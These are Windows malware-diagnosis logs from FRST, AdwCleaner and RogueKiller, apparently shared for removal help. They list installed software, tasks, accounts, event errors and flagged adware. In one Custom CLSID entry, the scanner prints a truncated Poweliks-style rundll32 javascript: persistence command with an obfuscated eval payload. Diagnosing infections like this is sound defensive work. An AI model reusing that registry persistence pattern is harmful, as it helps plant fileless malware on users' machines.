Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Windows Automated Installation Kit (HKLM\...\{31E8F586-4EF7-4500-844D-BA8756474FF1}) (Version: 2.0.0.0 - Microsoft Corporation)
Windows Driver Package - AnalogDevices (ADIHdAudAddService) MEDIA (08/05/2009 6.10.02.6595) (HKLM\...\A5711FCDB123FDFC12A06CDCA7EA8C60F8370DC5) (Version: 08/05/2009 6.10.02.6595 - AnalogDevices)
Windows Driver Package - Intel (e1kexpress) Net (06/22/2009 11.0.41.0) (HKLM\...\47953DA64A58724946E1C1EAFF72D4D6138B69F9) (Version: 06/22/2009 11.0.41.0 - Intel)
Windows Driver Package - Intel (HECIx64) System (06/23/2009 5.2.0.1008) (HKLM\...\4CF241D8BEE94EE801F312E8B49B8E5BAA90F29A) (Version: 06/23/2009 5.2.0.1008 - Intel)
Windows Driver Package - Intel (Serial) Ports (07/06/2009 5.5.1.1012) (HKLM\...\49AA6E0E36A92D25AFC2479DC7BCB705AE01CE1F) (Version: 07/06/2009 5.5.1.1012 - Intel)
Windows Driver Package - Intel Corporation (igfx) Display (08/13/2009 8.15.10.1872) (HKLM\...\157624FFB8919EB5518C572408100A734456F2E0) (Version: 08/13/2009 8.15.10.1872 - Intel Corporation)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-606911418-3109034106-3922174115-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-606911418-3109034106-3922174115-1000_Classes\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}\InprocServer32 -> C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\powercpl.dll No File

==================== Restore Points =========================

03-11-2014 03:01:09 Scheduled Checkpoint

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____N C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {128D76C8-7028-468B-977E-C90117E68814} - System32\Tasks\PCDEventLauncher => C:\Program Files\PC-Doctor\sessionchecker.exe [2011-06-27] (PC-Doctor, Inc.)
Task: {3304AF05-A723-4069-A962-EAD84FAC017E} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\PC-Doctor\uaclauncher.exe [2011-06-27] (PC-Doctor, Inc.)
Task: {90409AC3-C03C-4F43-B367-6CDE097B0ADB} - System32\Tasks\SystemToolsDailyTest => C:\Program Files\PC-Doctor\uaclauncher.exe [2011-06-27] (PC-Doctor, Inc.)
Task: {96E7D4EB-E47C-4C6B-9C36-79FB1D4DA37C} - \{BB0B37E5-22E3-2B40-FED2-DCC1CD9CCF9D} No Task File <==== ATTENTION
Task: {A653F635-2846-46C9-9F0D-D61FF57E3FBF} - System32\Tasks\TVT\ChangePWD => %RR%\rrcmd.exe
Task: {D50DCB71-264E-42D1-ADAA-9ABF4048AADA} - System32\Tasks\TVT\LaunchRnR => %RR%\rrcmd.exe
Task: {D854CD5A-DB3B-41A2-9D10-C6B6BFFECB0F} - System32\Tasks\TVT\UpdateRnR => %TVTCOMMON%\Scheduler\tvtsetsched.exe
Task: {F97F77C6-5696-408F-89F1-17A24D6C26F6} - System32\Tasks\PMTask => C:\Program Files (x86)\ThinkPad\Utilities\PWMIDTSV.EXE [2010-07-28] (Lenovo Group Limited)
Task: {FCCB621B-E6E2-41C3-B70A-323C5506BF37} - System32\Tasks\MCP => C:\Program Files (x86)\LENOVO\Message Center Plus\MCPLaunch.exe [2009-05-28] ()
Task: C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job => C:\Program Files\PC-Doctor\uaclauncher.exe
Task: C:\Windows\Tasks\SystemToolsDailyTest.job => C:\Program Files\PC-Doctor\uaclauncher.exe

==================== Loaded Modules (whitelisted) =============

2012-02-12 01:03 - 2005-03-12 01:07 - 00087040 ____N () C:\Windows\System32\pdfcmnnt.dll
2012-02-12 12:43 - 2010-03-03 09:45 - 00053248 ____N () C:\Program Files (x86)\D-Link\DWA-125 revA\ANIWConnService.exe
2011-11-26 19:50 - 2010-04-22 01:20 - 00177152 ____N () C:\Program Files\Lenovo\Lenovo Mouse Suite\PelService.exe
2013-09-23 08:34 - 2014-08-26 02:46 - 02640408 _____ () C:\Program Files (x86)\AVG Secure Search\vprot.exe
2011-11-26 19:50 - 2010-07-27 12:04 - 00029184 ____N () C:\Program Files (x86)\ThinkPad\Utilities\US\PWMRT64V.DLL
2011-11-26 19:50 - 2008-11-27 03:16 - 00018432 ____N () C:\Program Files\Lenovo\Lenovo Mouse Suite\FSRremoS.EXE
2011-11-26 19:50 - 2010-06-01 22:37 - 00228352 ____N () C:\Program Files\Lenovo\Lenovo Mouse Suite\PelElvDm.exe
2009-05-28 01:09 - 2009-05-28 01:09 - 00049976 ____N () C:\Program Files (x86)\LENOVO\Message Center Plus\MCPLaunch.exe
2012-02-28 11:20 - 2011-12-22 23:08 - 00051848 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\CodeLog.dll
2012-02-28 11:20 - 2008-11-25 17:18 - 01291264 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\libxml2.dll
2012-02-28 11:20 - 2004-10-05 03:08 - 00055808 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\zlib1.dll
2012-02-28 11:20 - 2011-12-22 23:08 - 00114312 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\ExchBackupSize.dll
2012-02-28 11:20 - 2011-12-22 23:08 - 00245896 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\ExImage.dll
2012-02-28 11:20 - 2011-12-22 23:08 - 00069768 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\EnumTapeDevice.dll
2012-02-28 11:20 - 2011-12-22 23:08 - 00064648 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\TbTapeBrowse.dll
2012-02-28 11:20 - 2011-12-23 15:15 - 00023176 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\AccountManager.dll
2012-02-28 11:20 - 2011-12-22 23:08 - 00093832 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\TBFireWall.dll
2011-11-26 19:46 - 2009-07-15 20:20 - 00077824 ____N () C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\DTMessageLib.dll
2012-02-12 12:44 - 2012-02-12 12:44 - 00315392 ____N () C:\Program Files (x86)\D-Link\DWA-125 revA\ANPDApi.dll
2012-02-12 12:43 - 2010-03-19 19:14 - 00294912 ____N () C:\Program Files (x86)\D-Link\DWA-125 revA\WlanApp.dll
2013-12-09 13:21 - 2014-03-21 08:19 - 01603608 _____ () C:\Program Files (x86)\AVG Secure Search\TBAPI.dll
2014-08-11 11:49 - 2014-08-11 11:49 - 00519704 _____ () C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\log4cplusU.dll
2014-10-30 20:00 - 2014-10-30 20:00 - 01375089 _____ () C:\Users\Deborah\Downloads\adwcleaner_3.311.exe

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)


==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\49112529.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\49112529.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist Remote Support Customer => ""="Service"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)


========================= Accounts: ==========================

Administrator (S-1-5-21-606911418-3109034106-3922174115-500 - Administrator - Enabled) => C:\Users\Administrator
Brenda (S-1-5-21-606911418-3109034106-3922174115-1001 - Limited - Enabled) => C:\Users\Brenda
Deborah (S-1-5-21-606911418-3109034106-3922174115-1000 - Administrator - Enabled) => C:\Users\Deborah
Diana (S-1-5-21-606911418-3109034106-3922174115-1053 - Administrator - Enabled)
Guest (S-1-5-21-606911418-3109034106-3922174115-501 - Limited - Disabled)
Nancy (S-1-5-21-606911418-3109034106-3922174115-1002 - Limited - Enabled)

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (11/04/2014 04:34:42 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094765
Faulting process id: 0x1b78
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/03/2014 06:53:05 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/03/2014 06:47:57 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/02/2014 07:54:34 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/02/2014 04:01:11 PM) (Source: PC-Doctor) (EventID: 1) (User: )
Description: (7444) Asapi: (16:01:11:9740)(7444) S3LogPusherPlugin.Helper - Error -- 340 Unable to storage the test log to medium

Error: (11/02/2014 11:34:39 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: jscript9.dll, version: 11.0.9600.17344, time stamp: 0x541b85e6
Exception code: 0xc0000005
Fault offset: 0x00127417
Faulting process id: 0x25a0
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/02/2014 06:49:27 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094fbf
Faulting process id: 0x3580
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 10:59:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x0034cf7e
Faulting process id: 0x1388
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 10:29:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094765
Faulting process id: 0x2d2c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (11/01/2014 10:21:33 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094765
Faulting process id: 0x19ec
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3


System errors:
=============
Error: (11/05/2014 08:33:46 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (11/05/2014 08:15:22 AM) (Source: srv) (EventID: 2017) (User: )
Description: The server was unable to allocate from the system nonpaged pool because the server reached the configured limit for nonpaged pool allocations.

Error: (11/04/2014 10:02:16 PM) (Source: srv) (EventID: 2017) (User: )
Description: The server was unable to allocate from the system nonpaged pool because the server reached the configured limit for nonpaged pool allocations.

Error: (11/04/2014 07:48:13 AM) (Source: srv) (EventID: 2017) (User: )
Description: The server was unable to allocate from the system nonpaged pool because the server reached the configured limit for nonpaged pool allocations.

Error: (11/04/2014 00:24:23 AM) (Source: srv) (EventID: 2017) (User: )
Description: The server was unable to allocate from the system nonpaged pool because the server reached the configured limit for nonpaged pool allocations.

Error: (11/03/2014 09:10:46 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Windows\System32\drivers\TrueSight.sys has been blocked from loading due to incompatibility with this system. Please contact your software vendor for a compatible version of the driver.

Error: (11/03/2014 09:10:19 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Windows\System32\drivers\TrueSight.sys has been blocked from loading due to incompatibility with this system. Please contact your software vendor for a compatible version of the driver.


Microsoft Office Sessions:
=========================
Error: (11/04/2014 04:34:42 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd000947651b7801cff876b4861bc0C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll62868c2b-646a-11e4-a3f6-50e549719966

Error: (11/03/2014 06:53:05 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/03/2014 06:47:57 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/02/2014 07:54:34 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/02/2014 04:01:11 PM) (Source: PC-Doctor) (EventID: 1) (User: )
Description: (7444) Asapi: (16:01:11:9740)(7444) S3LogPusherPlugin.Helper - Error -- 340 Unable to storage the test log to medium

Error: (11/02/2014 11:34:39 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7jscript9.dll11.0.9600.17344541b85e6c00000050012741725a001cff6ba0e99d2f5C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\jscript9.dll238b432a-62ae-11e4-bdb2-50e549719966

Error: (11/02/2014 06:49:27 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00094fbf358001cff6928245fff6C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll4bec0c79-6286-11e4-bdb2-50e549719966

Error: (11/01/2014 10:59:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd0034cf7e138801cff6512a52db7fC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll939db79e-6244-11e4-bdb2-50e549719966

Error: (11/01/2014 10:29:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd000947652d2c01cff64c0f49d66cC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll6afddfed-6240-11e4-bdb2-50e549719966

Error: (11/01/2014 10:21:33 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd0009476519ec01cff64be81db19bC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll57cde7a4-623f-11e4-bdb2-50e549719966


==================== Memory info ===========================

Processor: Pentium® Dual-Core CPU E6600 @ 3.06GHz
Percentage of memory in use: 41%
Total physical RAM: 3551.17 MB
Available physical RAM: 2067.54 MB
Total Pagefile: 7100.52 MB
Available Pagefile: 4308.02 MB
Total Virtual: 8192 MB
Available Virtual: 8191.85 MB

==================== Drives ================================

Drive c: (Windows7_OS) (Fixed) (Total:221.95 GB) (Free:94.42 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive q: (Lenovo_Recovery) (Fixed) (Total:9.77 GB) (Free:2.1 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 232.9 GB) (Disk ID: B2D7266B)
Partition 1: (Active) - (Size=1.2 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=221.9 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=9.8 GB) - (Type=07 NTFS)

==================== End Of Log ============================

# AdwCleaner v3.311 - Report created 05/11/2014 at 10:47:18
# Updated 30/09/2014 by Xplode
# Operating System : Windows 7 Professional Service Pack 1 (64 bits)
# Username : Deborah - ASSISTANT
# Running from : C:\Users\Deborah\Downloads\adwcleaner_3.311.exe
# Option : Scan

***** [ Services ] *****


***** [ Files / Folders ] *****

Folder Found : C:\Program Files (x86)\AVG Secure Search
Folder Found : C:\Program Files (x86)\AVG Security Toolbar
Folder Found : C:\Program Files (x86)\Common Files\AVG Secure Search
Folder Found : C:\ProgramData\AVG Secure Search
Folder Found : C:\ProgramData\Partner
Folder Found : C:\Users\Administrator\AppData\Local\AVG Secure Search
Folder Found : C:\Users\Administrator\AppData\LocalLow\AVG Secure Search
Folder Found : C:\Users\Deborah\AppData\Local\AVG Secure Search
Folder Found : C:\Users\Deborah\AppData\LocalLow\AVG Secure Search
Folder Found : C:\Users\Deborah\AppData\Roaming\pdfforge

***** [ Scheduled Tasks ] *****


***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Found : HKCU\Software\AVG Secure Search
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}
Key Found : [x64] HKCU\Software\AVG Secure Search
Key Found : HKLM\SOFTWARE\AVG Secure Search
Key Found : HKLM\SOFTWARE\AVG Security Toolbar
Key Found : HKLM\SOFTWARE\Classes\AppID\{1FDFF5A2-7BB1-48E1-8081-7236812B12B2}
Key Found : HKLM\SOFTWARE\Classes\AppID\{BB711CB0-C70B-482E-9852-EC05EBD71DBB}
Key Found : HKLM\SOFTWARE\Classes\AppID\ScriptHelper.EXE
Key Found : HKLM\SOFTWARE\Classes\AppID\ViProtocol.DLL
Key Found : HKLM\SOFTWARE\Classes\CLSID\{0B79C149-3B19-40DE-92BF-1A3AD9C1DA9D}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{229C56BB-A36A-4323-8C82-B136DF45697D}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{33E2B3CB-322E-4CBE-89F2-C06F5A35DB46}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{408CFAD9-8F13-4747-8EC7-770A339C7237}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{4E92DB5F-AAD9-49D3-8EAB-B40CBE5B1FF7}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{51080E66-F357-4F2A-9BFC-2456695883B5}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{537AD3CF-DE2B-4A1C-8279-C946B7E490D4}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{5BF7365D-25FF-40F3-8DEE-06ABEDF177CC}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{6DDA37BA-0553-499A-AE0D-BEBA67204548}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{933B95E2-E7B7-4AD9-B952-7AC336682AE3}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{94496571-6AC5-4836-82D5-D46260C44B17}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{A10A1344-B533-4C9E-BE4E-4C5BC4953047}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{B658800C-F66E-4EF3-AB85-6C0C227862A9}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{BA94BCE1-7E60-422D-9E7D-B853BC03FE78}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{BDCE611F-FDAA-4B10-A8E8-220A7897A69F}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{D0F1E414-1FAE-466C-B122-DE735B7BFF9D}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{E458510C-1DD5-4A05-8C4C-53BEF69C05E7}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{F25AF245-4A81-40DC-92F9-E9021F207706}
Key Found : HKLM\SOFTWARE\Classes\Interface\{03E2A1F3-4402-4121-8B35-733216D61217}
Key Found : HKLM\SOFTWARE\Classes\Interface\{4E92DB5F-AAD9-49D3-8EAB-B40CBE5B1FF7}
Key Found : HKLM\SOFTWARE\Classes\Interface\{9E3B11F6-4179-4603-A71B-A55F4BCB0BEC}
Key Found : HKLM\SOFTWARE\Classes\Interface\{C401D2CE-DC27-45C7-BC0C-8E6EA7F085D6}
Key Found : HKLM\SOFTWARE\Classes\protocols\handler\viprotocol
Key Found : HKLM\SOFTWARE\Classes\ScriptHelper.ScriptHelperApi
Key Found : HKLM\SOFTWARE\Classes\ScriptHelper.ScriptHelperApi.1
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{07CAC314-E962-4F78-89AB-DD002F2490EE}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{13ABD093-D46F-40DF-A608-47E162EC799D}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{74FB6AFD-DD77-4CEB-83BD-AB2B63E63C93}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{9C049BA6-EA47-4AC3-AED6-A66D8DC9E1D8}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{C2AC8A0E-E48E-484B-A71C-C7A937FAAB94}
Key Found : HKLM\SOFTWARE\Classes\ViProtocol.ViProtocolOLE
Key Found : HKLM\SOFTWARE\Classes\ViProtocol.ViProtocolOLE.1
Key Found : HKLM\SOFTWARE\Google\Chrome\Extensions\ndibdjnfmopecpmkdieinmbadjfpblof
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{F25AF245-4A81-40DC-92F9-E9021F207706}
Key Found : HKLM\SOFTWARE\Microsoft\Tracing\avg-secure-search-installer_RASAPI32
Key Found : HKLM\SOFTWARE\Microsoft\Tracing\avg-secure-search-installer_RASMANCS
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{C6FDD0C3-266A-4DC3-B459-28C697C44CDC}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{F25AF245-4A81-40DC-92F9-E9021F207706}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AVG Secure Search
Key Found : HKLM\SOFTWARE\MozillaPlugins\@avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{03E2A1F3-4402-4121-8B35-733216D61217}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{4E92DB5F-AAD9-49D3-8EAB-B40CBE5B1FF7}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{9E3B11F6-4179-4603-A71B-A55F4BCB0BEC}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{C401D2CE-DC27-45C7-BC0C-8E6EA7F085D6}
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{F25AF245-4A81-40DC-92F9-E9021F207706}
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}
Value Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [vProt]

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17344


*************************

AdwCleaner[R0].txt - [7439 octets] - [31/10/2014 04:13:18]
AdwCleaner[R1].txt - [6303 octets] - [05/11/2014 10:47:18]

########## EOF - C:\AdwCleaner\AdwCleaner[R1].txt - [6363 octets] ##########

RogueKiller V10.0.4.0 [Oct 29 2014] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : Deborah [Administrator]
Mode : Scan -- Date : 11/05/2014 10:56:09

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 20 ¤¤¤
[PUP] (X64) HKEY_CLASSES_ROOT\CLSID\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> Found
[PUP] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> Found
[PUP] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> Found
[PUP] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | vProt : "C:\Program Files (x86)\AVG Secure Search\vprot.exe" -> Found
[PUP] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vToolbarUpdater18.1.9 (C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe) -> Found
[PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\vToolbarUpdater18.1.9 (C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe) -> Found
[PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\vToolbarUpdater18.1.9 (C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe) -> Found
[PUM.Policies] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0 -> Found
[PUM.Policies] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0 -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-606911418-3109034106-3922174115-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-606911418-3109034106-3922174115-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-606911418-3109034106-3922174115-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-606911418-3109034106-3922174115-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-606911418-3109034106-3922174115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> Found
